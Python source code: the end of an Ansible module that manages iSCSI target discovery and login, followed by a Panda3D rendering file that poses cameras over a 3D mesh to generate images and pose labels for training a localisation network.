    global iscsiadm_cmd
    iscsiadm_cmd = module.get_bin_path('iscsiadm', required=True)
    # parameters
    portal = module.params['portal']
    target = module.params['target']
    port = module.params['port']
    login = module.params['login']
    automatic = module.params['auto_node_startup']
    discover = module.params['discover']
    show_nodes = module.params['show_nodes']
    check = module.check_mode
    cached = iscsi_get_cached_nodes(module, portal)
    # return json dict
    result = {}
    result['changed'] = False
    if discover:
        if portal is None:
            module.fail_json(msg = "Need to specify at least the portal (ip) to discover")
        elif check:
            # check mode: report what the cache currently holds.
            nodes = cached
        else:
            iscsi_discover(module, portal, port)
            nodes = iscsi_get_cached_nodes(module, portal)
        if not compare_nodelists(cached, nodes):
            result['changed'] |= True
            result['cache_updated'] = True
    else:
        nodes = cached
    if login is not None or automatic is not None:
        if target is None:
            # Without an explicit target there must be exactly one node.
            # NOTE(review): an empty node list would raise IndexError at
            # nodes[0] here — confirm whether that case needs a fail_json.
            if len(nodes) > 1:
                module.fail_json(msg = "Need to specify a target")
            else:
                target = nodes[0]
        else:
            # check given target is in cache
            check_target = False
            for node in nodes:
                if node == target:
                    check_target = True
                    break
            if not check_target:
                module.fail_json(msg = "Specified target not found")
    if show_nodes:
        result['nodes'] = nodes
    if login is not None:
        loggedon = target_loggedon(module, target)
        if (login and loggedon) or (not login and not loggedon):
            # Already in the desired session state.
            result['changed'] |= False
            if login:
                result['devicenodes'] = target_device_node(module, target)
        elif not check:
            if login:
                target_login(module, target)
                # give udev some time
                time.sleep(1)
                result['devicenodes'] = target_device_node(module, target)
            else:
                target_logout(module, target)
            result['changed'] |= True
            result['connection_changed'] = True
        else:
            # check mode: a change would be required.
            result['changed'] |= True
            result['connection_changed'] = True
    if automatic is not None:
        isauto = target_isauto(module, target)
        if (automatic and isauto) or (not automatic and not isauto):
            result['changed'] |= False
            result['automatic_changed'] = False
        elif not check:
            if automatic:
                target_setauto(module, target)
            else:
                target_setmanual(module, target)
            result['changed'] |= True
            result['automatic_changed'] = True
        else:
            result['changed'] |= True
            result['automatic_changed'] = True
    module.exit_json(**result)
# import module snippets
# Legacy Ansible pattern: the star import at the bottom provides
# AnsibleModule (used in main) and, presumably, os used by
# target_device_node — confirm against module_utils.basic.
from ansible.module_utils.basic import *
if __name__ == '__main__':
    main()
| 30.41688 | 121 | 0.60523 |
d6c8f06999e21b4fc3906ca6eedf8c73de959d23 | 46,727 | py | Python | PandaRender.py | galsh17/cartwheel_train | a50abe18cfe8c1f0f24267c3efa8537ecf211e72 | [
"MIT"
] | 32 | 2018-09-04T08:51:08.000Z | 2022-02-22T02:04:38.000Z | PandaRender.py | galsh17/cartwheel_train | a50abe18cfe8c1f0f24267c3efa8537ecf211e72 | [
"MIT"
] | 5 | 2019-05-27T07:54:52.000Z | 2022-01-11T10:14:25.000Z | PandaRender.py | galsh17/cartwheel_train | a50abe18cfe8c1f0f24267c3efa8537ecf211e72 | [
"MIT"
] | 14 | 2018-06-22T15:29:39.000Z | 2021-09-28T12:58:37.000Z | """ The training-render file. (class TrainRenderer)
Update: This class is render only class. It does not take the mainloop()
control. Basically need to call function step().
    Defines a rendering class. Defines a spinTask (panda3d) which basically
    renders 16 cameras at a time and sets them into a CPU queue. This queue
    is emptied by calls to step(). May build more purpose-built step()s
update: There are 3 Panda renderer in this file, viz. TrainRenderer,
TestRenderer, NetVLADRenderer. For comments on what each does check out
those classes. For general usage of the renderers see `test_render.py`
"""
# Panda3d
from direct.showbase.ShowBase import ShowBase
from panda3d.core import *
from direct.stdpy.threading2 import Thread
# Usual Math and Image Processing
import numpy as np
import cv2
from scipy import interpolate
# import caffe
# import tensorflow as tf
# Other System Libs
import os
import argparse
import Queue
import copy
import time
import code
import pickle
# Custom-Misc
import TerminalColors
import CubeMaker
import PathMaker
class TrainRenderer(ShowBase):
renderIndx=0
# Basic Mesh & Camera Setup
def loadAllTextures(self, mesh, basePath, silent=True):
""" Loads texture files for a mesh """
c = 0
for child in mesh.getChildren():
submesh_name = child.get_name()
submesh_texture = basePath + submesh_name[:-5] + 'tex0.jpg'
child.setTexture( self.loader.loadTexture(submesh_texture) )
if silent == False:
print 'Loading texture file : ', submesh_texture
c = c + 1
print self.tcolor.OKGREEN, "Loaded ", c, "textures", self.tcolor.ENDC
def setupMesh(self):
""" Loads the .obj files. Will load mesh sub-divisions separately """
print 'Attempt Loading Mesh VErtices, FAces'
self.cyt = self.loader.loadModel( 'model_l/l6/level_6_0_0.obj' )
self.cyt2 = self.loader.loadModel( 'model_l/l6/level_6_128_0.obj' )
self.low_res = self.loader.loadModel( 'model_l/l3/level_3_0_0.obj' )
print self.tcolor.OKGREEN, 'Done Loading Vertices', self.tcolor.ENDC
print 'Attempt Loading Textures'
self.loadAllTextures( self.cyt, 'model_l/l6/')
self.loadAllTextures( self.cyt2, 'model_l/l6/')
self.loadAllTextures( self.low_res, 'model_l/l3/')
print self.tcolor.OKGREEN, 'Done Loading Textures', self.tcolor.ENDC
def positionMesh(self):
""" WIll have to manually adjust this for ur mesh. I position the
center where I fly my drone and oriented in ENU (East-north-up)
cords for easy alignment of GPS and my cordinates. If your model
is not metric scale will have to adjust for that too"""
self.cyt.setPos( 140,-450, 150 )
self.cyt2.setPos( 140,-450, 150 )
self.low_res.setPos( 140,-450, 150 )
self.cyt.setHpr( 198, -90, 0 )
self.cyt2.setHpr( 198, -90, 0 )
self.low_res.setHpr( 198, -90, 0 )
self.cyt.setScale(172)
self.cyt2.setScale(172)
self.low_res.setScale(172)
def customCamera(self, nameIndx):
lens = self.camLens
lens.setFov(83)
print 'self.customCamera : Set FOV at 83'
my_cam = Camera("cam"+nameIndx, lens)
my_camera = self.scene0.attachNewNode(my_cam)
# my_camera = self.render.attachNewNode(my_cam)
my_camera.setName("camera"+nameIndx)
return my_camera
def customDisplayRegion(self, rows, cols):
rSize = 1.0 / rows
cSize = 1.0 / cols
dr_list = []
for i in range(0,rows):
for j in range(0,cols):
# print i*rSize, (i+1)*rSize, j*cSize, (j+1)*cSize
dr_i = self.win2.makeDisplayRegion(i*rSize, (i+1)*rSize, j*cSize, (j+1)*cSize)
dr_i.setSort(-5)
dr_list.append( dr_i )
return dr_list
## Gives a random 6-dof pose. Need to set params manually here.
## X,Y,Z, Yaw(abt Z-axis), Pitch(abt X-axis), Roll(abt Y-axis)
## @param No : no inputs
def monte_carlo_sample(self):
# mc_X_min etc are set in constructor
X = np.random.uniform(self.mc_X_min,self.mc_X_max)
Y = np.random.uniform(self.mc_Y_min,self.mc_Y_max)
Z = np.random.uniform(self.mc_Z_min,self.mc_Z_max)
yaw = np.random.uniform( self.mc_yaw_min, self.mc_yaw_max)
roll = 0#np.random.uniform( self.mc_roll_min, self.mc_roll_max)
pitch = 0#np.random.uniform( self.mc_pitch_min, self.mc_pitch_max)
return X,Y,Z, yaw,roll,pitch
## Annotation-helpers for self.render
def putBoxes(self,X,Y,Z,r=1.,g=0.,b=0., scale=1.0):
cube_x = CubeMaker.CubeMaker().generate()
cube_x.setColor(r,g,b)
cube_x.setScale(scale)
cube_x.reparentTo(self.render)
cube_x.setPos(X,Y,Z)
## Set a cube in 3d env
def putTrainingBox(self,task):
cube = CubeMaker.CubeMaker().generate()
cube.setTransparency(TransparencyAttrib.MAlpha)
cube.setAlphaScale(0.5)
# cube.setScale(10)
# mc_X_min etc are set in constructor
sx = 0.5 * (self.mc_X_max - self.mc_X_min)
sy = 0.5 * (self.mc_Y_max - self.mc_Y_min)
sz = 0.5 * (self.mc_Z_max - self.mc_Z_min)
ax = 0.5 * (self.mc_X_max + self.mc_X_min)
ay = 0.5 * (self.mc_Y_max + self.mc_Y_min)
az = 0.5 * (self.mc_Z_max + self.mc_Z_min)
cube.setSx(sx)
cube.setSy(sy)
cube.setSz(sz)
cube.reparentTo(self.render)
cube.setPos(ax,ay,az)
## Task. This task draw the XYZ axis
def putAxesTask(self,task):
if (task.frame / 10) % 2 == 0:
cube_x = CubeMaker.CubeMaker().generate()
cube_x.setColor(1.0,0.0,0.0)
cube_x.setScale(1)
cube_x.reparentTo(self.render)
cube_x.setPos(task.frame,0,0)
cube_y = CubeMaker.CubeMaker().generate()
cube_y.setColor(0.0,1.0,0.0)
cube_y.setScale(1)
cube_y.reparentTo(self.render)
cube_y.setPos(0,task.frame,0)
cube_z = CubeMaker.CubeMaker().generate()
cube_z.setColor(0.0,0.0,1.0)
cube_z.setScale(1)
cube_z.reparentTo(self.render)
cube_z.setPos(0,0,task.frame)
if task.time > 25:
return None
return task.cont
## Render-n-Learn task
##
## set pose in each camera <br/>
## make note of the poses just set as this will take effect next <br/>
## Retrive Rendered Data <br/>
## Cut rendered data into individual image. Note rendered data will be 4X4 grid of images <br/>
## Put imX into the queue <br/>
    def renderNlearnTask(self, task):
        """Panda3d task: pose all 16 cameras randomly, then harvest the
        previously rendered 4x4 grid into the image/label queues.

        Poses set here only take effect on the next rendered frame, so
        ``self.prevPoses`` (saved last call) is what matches the texture
        retrieved this call.
        """
        if task.time < 2: #do not do anything for 1st 2 sec
            return task.cont
        # print randX, randY, randZ
        #
        ## set pose in each camera
        # Note: The texture is grided images in a col-major format
        poses = np.zeros( (len(self.cameraList), 4), dtype='float32' )
        for i in range(len(self.cameraList)):
            randX,randY, randZ, randYaw, randPitch, randRoll = self.monte_carlo_sample()
            # if i<4 :
            #     randX = (i) * 30
            # else:
            #     randX = 0
            #
            # randY = 0#task.frame
            # randZ = 80
            # randYaw = 0
            # randPitch = 0
            # randRoll = 0
            self.cameraList[i].setPos(randX,randY,randZ)
            # -90 pitch offset points the camera straight down at the mesh
            self.cameraList[i].setHpr(randYaw,-90+randPitch,0+randRoll)
            poses[i,0] = randX
            poses[i,1] = randY
            poses[i,2] = randZ
            poses[i,3] = randYaw
            # self.putBoxes(randX,randY,randZ, scale=0.3)
        #
        # if task.frame < 100:
        #     return task.cont
        # else:
        #     return None
        ## make note of the poses just set as this will take effect next
        # First call: nothing has been rendered yet, just record the poses.
        if TrainRenderer.renderIndx == 0:
            TrainRenderer.renderIndx = TrainRenderer.renderIndx + 1
            self.prevPoses = poses
            return task.cont
        #
        ## Retrive Rendered Data
        tex = self.win2.getScreenshot()
        A = np.array(tex.getRamImageAs("RGB")).reshape(960,1280,3)
        # A = np.zeros((960,1280,3))
        # A_bgr = cv2.cvtColor(A.astype('uint8'),cv2.COLOR_RGB2BGR)
        # cv2.imwrite( str(TrainRenderer.renderIndx)+'.png', A_bgr.astype('uint8') )
        # myTexture = self.win2.getTexture()
        # print myTexture
        # retrive poses from prev render (these match the texture just read)
        texPoses = self.prevPoses
        #
        ## Cut rendered data into individual image. Note rendered data will be 4X4 grid of images
        #960 rows and 1280 cols (4x4 image-grid)
        nRows = 240
        nCols = 320
        # Iterate over the rendered texture in a col-major format
        c=0
        if self.q_imStack.qsize() < 150:
            for j in range(4): #j is for cols-indx
                for i in range(4): #i is for rows-indx
                    #print i*nRows, j*nCols, (i+1)*nRows, (j+1)*nCols
                    im = A[i*nRows:(i+1)*nRows,j*nCols:(j+1)*nCols,:]
                    #imX = im.astype('float32')/255. - .5 # TODO: have a mean image
                    #imX = (im.astype('float32') - 128.0) /128.
                    imX = im.astype('float32') #- self.meanImage
                    ## Put imX into the queue
                    # do not queue up if queue size begin to exceed 150
                    self.q_imStack.put( imX )
                    self.q_labelStack.put( texPoses[c,:] )
                    # fname = '__'+str(poses[c,0]) + '_' + str(poses[c,1]) + '_' + str(poses[c,2]) + '_' + str(poses[c,3]) + '_'
                    # cv2.imwrite( str(TrainRenderer.renderIndx)+'__'+str(i)+str(j)+fname+'.png', imX.astype('uint8') )
                    c = c + 1
        else:
            if self.queue_warning:
                print 'q_imStack.qsize() > 150. Queue is filled, not retriving the rendered data'
        #
        # Call caffe iteration (reads from q_imStack and q_labelStack)
        # Possibly upgrade to TensorFlow
        # self.learning_iteration()
        # if( TrainRenderer.renderIndx > 50 ):
        #     return None
        #
        # Prep for Next Iteration
        TrainRenderer.renderIndx = TrainRenderer.renderIndx + 1
        self.prevPoses = poses
        return task.cont
## Execute 1-step.
##
## This function is to be called from outside to render once. This is a wrapper for app.taskMgr.step()
    def step(self, batchsize):
        """ One rendering.
        This function needs to be called from outside in a loop for continous rendering
        Returns 2 variables. One im_batch and another label
        """
        # ltimes = int( batchsize/16 ) + 1
        # print 'Render ', ltimes, 'times'
        # for x in range(ltimes):
        # Note: 2 renders sometime fails. Donno exactly what happens :'(
        # Instead I do app.taskMgr.step() in the main() instead, once and 1 time here. This seem to work OK
        # self.taskMgr.step()
        # Thread.sleep(0.1)
        # Only advance the renderer while the queue is not yet full enough.
        if self.q_imStack.qsize() < 16*5:
            self.taskMgr.step()
        # print 'Queues Status (imStack=%d,labelStack=%d)' %(self.q_imStack.qsize(), self.q_labelStack.qsize())
        # TODO: Check validity of batchsize. Also avoid hard coding the thresh for not retriving from queue.
        im_batch = np.zeros((batchsize,240,320,3))
        label_batch = np.zeros((batchsize,4))
        # assert self.q_imStack.qsize() > 16*5
        if self.q_imStack.qsize() >= 16*5:
            # get a batch out
            for i in range(batchsize):
                im = self.q_imStack.get() #240x320x3 RGB
                y = self.q_labelStack.get()
                # print 'retrive', i
                #remember to z-normalize
                im_batch[i,:,:,0] = copy.deepcopy(im[:,:,0])#self.zNormalized( copy.deepcopy(im[:,:,0]) )
                im_batch[i,:,:,1] = copy.deepcopy(im[:,:,1])#self.zNormalized( copy.deepcopy(im[:,:,1]) )
                im_batch[i,:,:,2] = copy.deepcopy(im[:,:,2])#self.zNormalized( copy.deepcopy(im[:,:,2]) )
                label_batch[i,0] = copy.deepcopy( y[0] )
                label_batch[i,1] = copy.deepcopy( y[1] )
                label_batch[i,2] = copy.deepcopy( y[2] )
                label_batch[i,3] = copy.deepcopy( y[3] )
        else:
            return None, None
        # NOTE(review): execution falls through here even when the branch
        # above filled im_batch/label_batch from the queues, so that freshly
        # dequeued batch is unconditionally overwritten by the pickle load
        # below -- rendered frames are consumed but never returned. The
        # trailing note suggests the pickle path was meant only as a
        # fallback; confirm this fall-through is intended.
        f_im = 'im_batch.pickle'
        f_lab = 'label_batch.pickle'
        print 'Loading : ', f_im, f_lab
        with open( f_im, 'rb' ) as handle:
            im_batch = pickle.load(handle )
        with open( f_lab, 'rb' ) as handle:
            label_batch = pickle.load(handle )
        print 'Done.@!'
        # im_batch = copy.deepcopy( self.X_im_batch )
        # # label_batch = copy.deepcopy( self.X_label_batch )
        #
        # Draw `batchsize` random samples (with replacement) from the load.
        r0 = np.random.randint( 0, im_batch.shape[0], batchsize )
        # r1 = np.random.randint( 0, im_batch.shape[0], batchsize )
        im_batch = im_batch[r0]
        label_batch = label_batch[r0]
        # Note:
        #   What is being done here is a bit of a hack. The thing is
        #   in the mainloop() ie. in train_tf_decop.py doesn't allow any
        #   if statements. So, I have instead saved a few example-renders on a
        #   pickle-file. If the queue is not sufficiently filled i just return
        #   from the saved file.
        return im_batch, label_batch
    def __init__(self, queue_warning=True):
        """Build the Panda3d scene: load and position the mesh, create an
        offscreen 1280x960 window split into a 4x4 grid of 16 cameras, and
        create the image/label queues filled by renderNlearnTask().

        queue_warning=False suppresses the queue-full warning print.
        """
        ShowBase.__init__(self)
        self.taskMgr.add( self.renderNlearnTask, "renderNlearnTask" ) #changing camera poses
        self.taskMgr.add( self.putAxesTask, "putAxesTask" ) #draw co-ordinate axis
        self.taskMgr.add( self.putTrainingBox, "putTrainingBox" )
        self.queue_warning = queue_warning #suppress the warning of queue full if this var is True
        # Set up training area. This is used in monte_carlo_sample() and putTrainingBox()
        self.mc_X_max = 300
        self.mc_X_min = -300
        self.mc_Y_max = 360
        self.mc_Y_min = -360
        self.mc_Z_max = 120
        self.mc_Z_min = 45
        self.mc_yaw_max = 60
        self.mc_yaw_min = -60
        self.mc_roll_max = 5
        self.mc_roll_min = -5
        self.mc_pitch_max = 5
        self.mc_pitch_min = -5
        # # Note params
        # self.PARAM_TENSORBOARD_PREFIX = TENSORBOARD_PREFIX
        # self.PARAM_MODEL_SAVE_PREFIX = MODEL_SAVE_PREFIX
        # self.PARAM_MODEL_RESTORE = MODEL_RESTORE
        #
        # self.PARAM_WRITE_SUMMARY_EVERY = WRITE_SUMMARY_EVERY
        # self.PARAM_WRITE_TF_MODEL_EVERY = WRITE_TF_MODEL_EVERY
        # Misc Setup
        self.render.setAntialias(AntialiasAttrib.MAuto)
        self.setFrameRateMeter(True)
        self.tcolor = TerminalColors.bcolors()
        #
        # Set up Mesh (including load, position, orient, scale)
        self.setupMesh()
        self.positionMesh()
        # Custom Render
        # Important Note: self.render displays the low_res and self.scene0 is the images to retrive
        self.scene0 = NodePath("scene0")
        # cytX = copy.deepcopy( cyt )
        self.low_res.reparentTo(self.render)
        self.cyt.reparentTo(self.scene0)
        self.cyt2.reparentTo(self.scene0)
        #
        # Make Buffering Window (offscreen render target read back each frame)
        bufferProp = FrameBufferProperties().getDefault()
        props = WindowProperties()
        props.setSize(1280, 960)
        win2 = self.graphicsEngine.makeOutput( pipe=self.pipe, name='wine1',
                sort=-1, fb_prop=bufferProp , win_prop=props,
                flags=GraphicsPipe.BFRequireWindow)
                #flags=GraphicsPipe.BFRefuseWindow)
        # self.window = win2#self.win #dr.getWindow()
        self.win2 = win2
        # self.win2.setupCopyTexture()
        # Adopted from : https://www.panda3d.org/forums/viewtopic.php?t=3880
        #
        # Set Multiple Cameras
        self.cameraList = []
        for i in range(4*4):
            print 'Create camera#', i
            self.cameraList.append( self.customCamera( str(i) ) )
        # Disable default camera
        # dr = self.camNode.getDisplayRegion(0)
        # dr.setActive(0)
        #
        # Set Display Regions (4x4)
        dr_list = self.customDisplayRegion(4,4)
        #
        # Setup each camera
        for i in range(len(dr_list)):
            dr_list[i].setCamera( self.cameraList[i] )
        #
        # Set buffered Queues (to hold rendered images and their positions)
        # each queue element will be an RGB image of size 240x320x3
        self.q_imStack = Queue.Queue()
        self.q_labelStack = Queue.Queue()
        print self.tcolor.OKGREEN, '\n##########\n'+'Panda3d Renderer Initialization Complete'+'\n##########\n', self.tcolor.ENDC
class TestRenderer(ShowBase):
    """Renderer that flies a single camera along a spline path.

    Each tick, renderNtestTask() evaluates the spline at the current frame
    index, poses the (single) camera there, and queues the rendered
    240x320 RGB frame together with its (X, Y, Z, yaw) label.
    """
    renderIndx=0  # class-level frame counter shared across instances
    ## Basic Mesh & Camera Setup
    def loadAllTextures(self, mesh, basePath, silent=True):
        """ Loads texture files for a mesh """
        c = 0
        for child in mesh.getChildren():
            submesh_name = child.get_name()
            # Texture file shares the submesh name stem: <stem>tex0.jpg
            submesh_texture = basePath + submesh_name[:-5] + 'tex0.jpg'
            child.setTexture( self.loader.loadTexture(submesh_texture) )
            if silent == False:
                print 'Loading texture file : ', submesh_texture
            c = c + 1
        print self.tcolor.OKGREEN, "Loaded ", c, "textures", self.tcolor.ENDC
    def setupMesh(self):
        """ Loads the .obj files. Will load mesh sub-divisions separately """
        print 'Attempt Loading Mesh VErtices, FAces'
        self.cyt = self.loader.loadModel( 'model_l/l6/level_6_0_0.obj' )
        self.cyt2 = self.loader.loadModel( 'model_l/l6/level_6_128_0.obj' )
        self.low_res = self.loader.loadModel( 'model_l/l0/level_0_0_0.obj' )
        print self.tcolor.OKGREEN, 'Done Loading Vertices', self.tcolor.ENDC
        print 'Attempt Loading Textures'
        self.loadAllTextures( self.cyt, 'model_l/l6/')
        self.loadAllTextures( self.cyt2, 'model_l/l6/')
        self.loadAllTextures( self.low_res, 'model_l/l0/')
        print self.tcolor.OKGREEN, 'Done Loading Textures', self.tcolor.ENDC
    def positionMesh(self):
        """ Will have to manually adjust this for your mesh. I position the
            center where I fly my drone and oriented in ENU (East-north-up)
            coords for easy alignment of GPS and my coordinates. If your model
            is not metric scale will have to adjust for that too"""
        self.cyt.setPos( 140,-450, 150 )
        self.cyt2.setPos( 140,-450, 150 )
        self.low_res.setPos( 140,-450, 150 )
        self.cyt.setHpr( 198, -90, 0 )
        self.cyt2.setHpr( 198, -90, 0 )
        self.low_res.setHpr( 198, -90, 0 )
        self.cyt.setScale(172)
        self.cyt2.setScale(172)
        self.low_res.setScale(172)
    def customCamera(self, nameIndx):
        """Create a camera node (FOV 83 deg) attached under self.scene0."""
        lens = self.camLens
        lens.setFov(83)
        print 'self.customCamera : Set FOV at 83'
        my_cam = Camera("cam"+nameIndx, lens)
        my_camera = self.scene0.attachNewNode(my_cam)
        # my_camera = self.render.attachNewNode(my_cam)
        my_camera.setName("camera"+nameIndx)
        return my_camera
    def customDisplayRegion(self, rows, cols):
        """Split self.win2 into a rows x cols grid of display regions."""
        rSize = 1.0 / rows
        cSize = 1.0 / cols
        dr_list = []
        for i in range(0,rows):
            for j in range(0,cols):
                # print i*rSize, (i+1)*rSize, j*cSize, (j+1)*cSize
                dr_i = self.win2.makeDisplayRegion(i*rSize, (i+1)*rSize, j*cSize, (j+1)*cSize)
                dr_i.setSort(-5)
                dr_list.append( dr_i )
        return dr_list
    def monte_carlo_sample(self):
        """ Gives a random 6-dof pose. Need to set params manually here.
            X,Y,Z, Yaw(abt Z-axis), Pitch(abt X-axis), Roll(abt Y-axis) """
        X = np.random.uniform(-50,50)
        Y = np.random.uniform(-100,100)
        Z = np.random.uniform(50,100)
        yaw = np.random.uniform(-60,60)
        roll = np.random.uniform(-5,5)
        pitch = np.random.uniform(-5,5)
        return X,Y,Z, yaw,roll,pitch
    ## Annotation-helpers for self.render
    def putBoxes(self,X,Y,Z,r=1.,g=0.,b=0., scale=1.0):
        """Drop one colored marker cube at (X, Y, Z) in the visible scene."""
        cube_x = CubeMaker.CubeMaker().generate()
        cube_x.setColor(r,g,b)
        cube_x.setScale(scale)
        cube_x.reparentTo(self.render)
        cube_x.setPos(X,Y,Z)
    def putAxesTask(self,task):
        """Task: trace the X (red), Y (green), Z (blue) axes with unit
        cubes at distance task.frame; retires after 25 s."""
        cube_x = CubeMaker.CubeMaker().generate()
        cube_x.setColor(1.0,0.0,0.0)
        cube_x.setScale(1)
        cube_x.reparentTo(self.render)
        cube_x.setPos(task.frame,0,0)
        cube_y = CubeMaker.CubeMaker().generate()
        cube_y.setColor(0.0,1.0,0.0)
        cube_y.setScale(1)
        cube_y.reparentTo(self.render)
        cube_y.setPos(0,task.frame,0)
        cube_z = CubeMaker.CubeMaker().generate()
        cube_z.setColor(0.0,0.0,1.0)
        cube_z.setScale(1)
        cube_z.reparentTo(self.render)
        cube_z.setPos(0,0,task.frame)
        if task.time > 25:
            return None
        return task.cont
    ## Render-n-Learn task.
    ## Sets the camera position (1-cam only) with spline or your choice (see init).
    ### Renders the image at that point and queue the image and its position (pose)
    def renderNtestTask(self, task):
        """Panda3d task: follow the spline, queue each frame and its pose.

        Like renderNlearnTask in the training renderer, poses take effect
        one frame late; self.prevPoses matches the texture read this call.
        Ends (returns None) when the spline parameter runs out.
        """
        if task.frame < 50: #do not do anything for 50 ticks, as spline's 1st node is at t=50
            return task.cont
        # print randX, randY, randZ
        t = task.frame
        if t > self.spl_u.max():
            print 'End of Spline, End task'
            # fName = 'trace__' + self.pathGen.__name__ + '.npz'
            # np.savez( fName, loss=self.loss_ary, gt=self.gt_ary, pred=self.pred_ary )
            # print 'PathData File Written : ', fName
            # print 'Visualize result : `python tools/analyse_path_trace_subplot.py', fName, '`'
            return None
        #
        # set pose in each camera
        # Note: The texture is grided images in a col-major format
        # TODO : since it is going to be only 1 camera eliminate this loop to simply code
        poses = np.zeros( (len(self.cameraList), 4), dtype='float32' )
        for i in range(len(self.cameraList)): #here usually # of cams will be 1 (for TestRenderer)
            indx = TestRenderer.renderIndx
            # Evaluate the fitted parametric spline at frame index t
            pt = interpolate.splev( t, self.spl_tck)
            #randX,randY, randZ, randYaw, randPitch, randRoll = self.monte_carlo_sample()
            randX = pt[0]
            randY = pt[1]
            randZ = pt[2]
            randYaw = pt[3]
            randPitch = 0
            randRoll = 0
            self.cameraList[i].setPos(randX,randY,randZ)
            self.cameraList[i].setHpr(randYaw,-90+randPitch,0+randRoll)
            poses[i,0] = randX
            poses[i,1] = randY
            poses[i,2] = randZ
            poses[i,3] = randYaw
        # make note of the poses just set as this will take effect next
        if TestRenderer.renderIndx == 0:
            TestRenderer.renderIndx = TestRenderer.renderIndx + 1
            # self.putBoxes(0,0,0, scale=100)
            self.prevPoses = poses
            return task.cont
        #
        # Retrive Rendered Data
        tex = self.win2.getScreenshot()
        # A = np.array(tex.getRamImageAs("RGB")).reshape(960,1280,3) #@#
        A = np.array(tex.getRamImageAs("RGB")).reshape(240,320,3)
        # A = np.zeros((960,1280,3))
        # A_bgr = cv2.cvtColor(A.astype('uint8'),cv2.COLOR_RGB2BGR)
        # cv2.imwrite( str(TestRenderer.renderIndx)+'.png', A_bgr.astype('uint8') )
        # myTexture = self.win2.getTexture()
        # print myTexture
        # retrive poses from prev render
        texPoses = self.prevPoses
        #
        # Cut rendered data into individual image. Note rendered data will be 4X4 grid of images
        #960 rows and 1280 cols (4x4 image-grid)
        nRows = 240
        nCols = 320
        # Iterate over the rendered texture in a col-major format
        c=0
        # TODO : Eliminate this 2-loop as we know there is only 1 display region
        #if self.q_imStack.qsize() < 150: #no limit on queue size
        # for j in range(1): #j is for cols-indx
        #     for i in range(1): #i is for rows-indx
        i=0
        j=0
        #print i*nRows, j*nCols, (i+1)*nRows, (j+1)*nCols
        im = A[i*nRows:(i+1)*nRows,j*nCols:(j+1)*nCols,:]
        #imX = im.astype('float32')/255. - .5 # TODO: have a mean image
        #imX = (im.astype('float32') - 128.0) /128.
        imX = im.astype('float32') #- self.meanImage
        # Put imX into the queue
        # do not queue up if queue size begin to exceed 150
        self.q_imStack.put( imX )
        self.q_labelStack.put( texPoses[c,:] )
        self.putBoxes( texPoses[c,0], texPoses[c,1], texPoses[c,2] )
        # print 'putBoxes', texPoses[c,0], texPoses[c,1], texPoses[c,2]
        # fname = '__'+str(poses[c,0]) + '_' + str(poses[c,1]) + '_' + str(poses[c,2]) + '_' + str(poses[c,3]) + '_'
        # cv2.imwrite( str(TestRenderer.renderIndx)+'__'+str(i)+str(j)+fname+'.png', imX.astype('uint8') )
        c = c + 1
        #
        # Prep for Next Iteration
        TestRenderer.renderIndx = TestRenderer.renderIndx + 1
        self.prevPoses = poses
        # if( TestRenderer.renderIndx > 5 ):
        #     return None
        return task.cont
    def step(self):
        """Advance the task manager one tick, then dequeue and return one
        (image, pose) pair, or (None, None) while fewer than 3 are queued."""
        self.taskMgr.step()
        # print 'Queues Status (imStack=%d,labelStack=%d)' %(self.q_imStack.qsize(), self.q_labelStack.qsize())
        # Dequeue 1 elements
        if self.q_imStack.qsize() > 2: # Do not dequeue if the queue size is less than 2
            im = copy.deepcopy( self.q_imStack.get() ) #240x320x3 RGB
            y = copy.deepcopy( self.q_labelStack.get() )
            return im, y
        else:
            return None, None
    def __init__(self, pathGen=None ):
        """Build the test scene with a single 320x240 camera.

        pathGen: optional callable returning (t, X) path knots; defaults
        to PathMaker's path_large_loop. The knots are fitted with a
        periodic parametric spline, followed frame-by-frame by
        renderNtestTask().
        """
        ShowBase.__init__(self)
        self.taskMgr.add( self.renderNtestTask, "renderNtestTask" ) #changing camera poses
        self.taskMgr.add( self.putAxesTask, "putAxesTask" ) #draw co-ordinate axis
        # Misc Setup
        self.render.setAntialias(AntialiasAttrib.MAuto)
        self.setFrameRateMeter(True)
        self.tcolor = TerminalColors.bcolors()
        #
        # Set up Mesh (including load, position, orient, scale)
        self.setupMesh()
        self.positionMesh()
        # Custom Render
        # Important Note: self.render displays the low_res and self.scene0 is the images to retrive
        self.scene0 = NodePath("scene0")
        # cytX = copy.deepcopy( cyt )
        self.low_res.reparentTo(self.render)
        self.cyt.reparentTo(self.scene0)
        self.cyt2.reparentTo(self.scene0)
        #
        # Make Buffering Window
        bufferProp = FrameBufferProperties().getDefault()
        props = WindowProperties()
        # props.setSize(1280, 960)
        props.setSize(320, 240) #@#
        win2 = self.graphicsEngine.makeOutput( pipe=self.pipe, name='wine1',
                sort=-1, fb_prop=bufferProp , win_prop=props,
                flags=GraphicsPipe.BFRequireWindow)
                #flags=GraphicsPipe.BFRefuseWindow)
        # self.window = win2#self.win #dr.getWindow()
        self.win2 = win2
        # self.win2.setupCopyTexture()
        # Adopted from : https://www.panda3d.org/forums/viewtopic.php?t=3880
        #
        # Set Multiple Cameras
        self.cameraList = []
        # for i in range(4*4):
        for i in range(1*1): #@#
            print 'Create camera#', i
            self.cameraList.append( self.customCamera( str(i) ) )
        # Disable default camera
        # dr = self.camNode.getDisplayRegion(0)
        # dr.setActive(0)
        #
        # Set Display Regions (1x1 here, unlike the 4x4 training renderer)
        dr_list = self.customDisplayRegion(1,1)
        #
        # Setup each camera
        for i in range(len(dr_list)):
            dr_list[i].setCamera( self.cameraList[i] )
        #
        # Set buffered Queues (to hold rendered images and their positions)
        # each queue element will be an RGB image of size 240x320x3
        self.q_imStack = Queue.Queue()
        self.q_labelStack = Queue.Queue()
        #
        # Setting up Splines
        # Note: Start interpolation at 50,
        if pathGen is None:
            # self.pathGen = PathMaker.PathMaker().path_flat_h
            # self.pathGen = PathMaker.PathMaker().path_smallM
            # self.pathGen = PathMaker.PathMaker().path_yaw_only
            # self.pathGen = PathMaker.PathMaker().path_bigM
            # self.pathGen = PathMaker.PathMaker().path_flat_spiral
            # self.pathGen = PathMaker.PathMaker().path_helix
            # self.pathGen = PathMaker.PathMaker().path_like_real
            # self.pathGen = PathMaker.PathMaker().path_like_real2
            self.pathGen = PathMaker.PathMaker().path_large_loop
        else:
            self.pathGen = pathGen
        t,X = self.pathGen()
        # Fit a periodic (per=1), exact (s=0.0) parametric spline through the
        # path knots; renderNtestTask() evaluates it with splev each frame.
        self.spl_tck, self.spl_u = interpolate.splprep(X.T, u=t.T, s=0.0, per=1)
